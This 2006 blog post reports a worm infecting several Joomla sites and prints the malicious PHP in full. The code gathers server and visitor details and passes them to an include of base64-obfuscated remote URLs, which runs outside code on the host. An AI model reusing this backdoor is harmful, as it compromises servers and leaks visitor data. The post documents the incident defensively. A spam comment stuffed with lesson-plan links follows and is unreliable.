« | »

Renzki's hack report

2006-04-24 @ 05:13 in Blaogy Dev

I got a very urgent call for help from Renzki this afternoon. All his joomla sites got a parse error somewhere in mosce.php file.

After checking googles and joomla forum I understood that it's a hack... or more precisely a worm virus. It's very annoying. Almost in all directories, I see files like remote.php guest.php packages.php tests.php create.php etc... and also .htaccess files. those files contain quite the same script, they are base64_encode-ed so we can understand the files from decoding them.


This is one of them

<? error_reporting(0);
$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s";
if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1"."/?".$str))){} else {include(base64_decode("aHR0cDovLw==".base64_decode("dXNlcjcuaHRtbHRhZ3MucnU="."/?".$str);
} ?>
When those encoded strings were decoded they are websites... usually
http://xxx.xxx.ru 

 

So they are really virus.

I tried to remove the files manually but they are too much. So we had to reinstall joomla using another path... and rename the jooomla database to be used with the new one. then reinstall one by one all the modules and components and templates. And all that should be done with all infected sites.

That's the problem with open source... (Yes... open source matters) because everybody knows how your files are structured and if they find a hole, then you're kicked off.

And I was supposed to not to work today

Hevitra

Aww hang on Hery ;) You still have a day off tomorrow right? Take care and please don't work too hard lol (im joking) But wouldn't it be funny if one day you just say to us a big announcement that you are on strike lol...I don't know what would happen to all of us :O Anyway I am sorry to hear for what have happen I can imagine for all that amount of work and then screwed by some stupid hacker or a virus geezz! Well take care and I still hope you will have a good day off :)

Nampidirin'i Mirana @ 12:28, 2006-04-24 [Valio]

Your site is very convenient in navigation and has good design. Thanks!
lessonplans
[url=http://lessonplans.planblog.info] lessonplans [/url]
lesson plan format grammar lesson plan insect lesson plan ocean lesson plan preschool winter lesson plan the mitten lesson plan
[url=http://lessonplans.planblog.info/poetry-lesson-plan.html] poetry lesson plan [/url][url=http://lessonplans.planblog.info/reading-lesson-plan.html] reading lesson plan [/url][url=http://lessonplans.planblog.info/volcano-lesson-plan---.html] volcano lesson plan [/url][url=http://lessonplans.planblog.info/lesson-plan-for-preschoolers--.html] lesson plan for preschoolers [/url][url=http://lessonplans.planblog.info/sample-lesson-plan.html] sample lesson plan [/url][url=http://lessonplans.planblog.info/language-arts-lesson-plan.html] language arts lesson plan [/url][url=http://lessonplans.planblog.info/bible-lesson-plan.html] bible lesson plan [/url][url=http://lessonplans.planblog.info/christmas-around-the-world-lesson-plan.html] christmas around the world lesson plan [/url]

Nampidirin'i Ivan @ 04:59, 2007-04-10 [Valio]
Momba ahy
hery

Ho hitanao ato ny isandroko. Angoniko ato mba hovakiako indray any aoriana any :-)

calendar
« Aprily 2019 »
At Ta Ar Ak Zo As Ah
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30          
Rohy
  • Blogroll
Tahiry